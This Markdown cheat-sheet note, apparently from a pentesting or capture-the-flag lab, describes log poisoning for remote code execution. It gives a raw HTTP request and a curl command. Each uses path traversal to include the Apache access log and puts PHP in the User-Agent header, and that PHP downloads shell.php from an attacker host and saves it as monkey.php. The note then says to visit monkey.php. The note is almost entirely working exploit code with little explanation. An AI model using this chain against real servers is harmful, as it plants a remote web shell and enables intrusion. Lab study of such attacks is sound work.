21 lines
744 B
Markdown
21 lines
744 B
Markdown
# RCE inside HTTP Request Header
|
|
|
|
* a.k.a. Log Poisoning
|
|
* User Agent can be filled with php code
|
|
```sh
|
|
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
|
|
Host: 10.10.59.238
|
|
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
|
|
[...]
|
|
```
|
|
|
|
* copied from browser as curl command:
|
|
```
|
|
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
|
|
```
|
|
* go to the access log
|
|
```sh
|
|
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
|
|
```
|
|
* Afterwards visit `10.10.211.157/monkey.php`
|